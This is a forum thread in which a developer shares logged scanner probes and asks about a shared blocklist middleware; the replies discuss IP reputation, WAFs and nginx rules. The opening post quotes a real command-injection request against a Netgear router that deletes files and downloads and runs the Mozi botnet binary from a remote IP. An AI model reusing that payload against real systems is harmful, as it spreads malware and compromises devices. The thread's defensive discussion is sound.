by usernamebias on 4/7/21, 2:33 AM with 43 comments
I've recently started logging pings to my services, A LOT of servers ping me constantly checking for things like '.env' and other known vulnerabilities. I currently have a JSON dataset of about 10K entries. It looks like this.
{ "offense": "boaform/admin/formLogin?username=ec8&psd=ec8", "ipAddress": "125.47.68.164" },
{ "offense": ".env", "ipAddress": "52.224.55.198" },
{ "offense": "setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://115.58.115.18:53153/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1", "ipAddress": "115.58.115.18" }
Maybe we don't filter by ip address, and instead filter requests based on known strings (or regex). That's what i'm currently doing. Ex. If request includes '.env'. Blocked!
I'd love to implement a more aggressive strategy. Rather than a reactive one. I'm currently finding myself going through server logs, and adding new 'keywords' to the 'banned list'.
Like a 'ad blocklist' we can use as middleware in our HTTP applications.
If something exists already, kindly point me to a Github.
by thephyber on 4/7/21, 3:12 AM
What you propose is very similar to what happens with email IP reputation. If you look at all of the effort that goes into verifying as few false positives and false negatives as possible, you should probably consider why that effort is put in. Example: what happens if a malicious user who works on behalf of a rival company to yours creates a Pull Request to your list with your customer’s IP addresses? Could you realistically identify the issue and the malicious user before it hurt your corporate reputation?
I don’t think your idea is bad, but you have to realize that the concept of an IP address as a proxy for an actor/reputation is not as valuable in recent years as it used to be. With IPv6 and cheap botnet access, your list will fill up with junk when the attacker spends very little effort to add new GET/POST rules and new clients.
I would recommend you spend some time considering how much you care about this particular cat and mouse game when CDNs and WAFs have already made products which cater to this need.
by ggm on 4/7/21, 2:40 AM
What are you going to do when the addresses belong to the US mil and are being promiscuously misused by lots of ISPs?
What are you going to do about politically motivated and other non benign influences on the blacklist like wanting to boycott China?
(I work in a regional internet registry so I should declare my interest i guess)
by trinovantes on 4/7/21, 2:50 AM
by mjbrownie on 4/7/21, 3:07 AM
location / {
return 444;
access_log off;
}
location /a/ {
...
}by bradknowles on 4/7/21, 5:30 AM
IP address reputation based blocking was a concept that we saw back in the mid-90s when I was fighting spam as the Senior Internet Mail Administrator at AOL. It worked okay, for a while. It quickly became a game of cat-and-mouse, where some spammers wouldn’t care that we blocked them, but plenty others found various ways around the blocks we were implementing.
More than 25 years later, and the problem really hasn’t changed that much. You still get lots of people who think they can just block stuff by IP addresses and that will solve all the problems.
The best modern WAFs that I’ve seen in the past five to ten years are probabilistic at best. Set the rejection threshold too low, and you start getting way too many false positive hits. Set the rejection threshold too low, and too many attacks just skip right past the WAF. They are a tool you need to have in your toolbox and you need to make use of them, but they are weak protection, at best. They’re table stakes, which set a low bar for your attackers to clear.
Mod_Security is an excellent example of a free and relatively low effort WAF that you can implement, but there are alternatives. Fastly is a well known commercial CDN/WAF provider, but Cloudflare has their WAF service, AWS has a built-in service, etc....
If you really want to be secure against attackers, you need to make sure that every layer of your code is secure. Do all the standard network scanning and fuzzing tools. Have someone play red team against your system and see if they can penetrate your defenses. Use the source code analysis tools that are appropriate for your language — Fortify might not always be the right answer. Use the dynamic application security tools like the stuff from Contrast Security, where they can scan your object code as it is running in real time and monitor for all known vulnerabilities and attack patterns, and then update that list of things to scan for in real time.
Make sure you actually fix the weaknesses that are turned up by these tools. It doesn’t help you to identify a bunch of problems and then just leave them unfixed.
The OWASP stuff is a start, but they’re just skimming the surface. This is a true deepness with no bottom.
by zamalek on 4/7/21, 4:51 AM
A banned IP may be rotated to a legitimate user under many scenarios. Only ban/blackhole IPs for a limited duration.
by jrockway on 4/7/21, 3:24 AM
How useful it is to rate limit on known attacks, I don't actually know. I feel like you really only need one request to exploit a 0day, so it probably provides no protection.
by AndroidKitKat on 4/7/21, 3:48 AM
by indymike on 4/7/21, 3:19 AM
by kjrose on 4/7/21, 4:11 AM
by TameAntelope on 4/7/21, 3:53 AM
by rognjen on 4/7/21, 8:59 AM
That means whenever a server is compromised it'd have this type of stuff installed and it'd start running it immediately.
That means two things: the list would indefinitely block servers that have been compromised but then cleaned up, and you'd never get a list comprehensive enough because servers are constantly being compromised.
by farazzz123 on 4/7/21, 5:08 AM
by farazzz123 on 4/7/21, 5:07 AM
by nickphx on 4/7/21, 5:14 AM
by jpmoral on 4/7/21, 5:11 AM
by ev1 on 4/7/21, 3:10 AM
by sgrinich on 4/7/21, 3:55 AM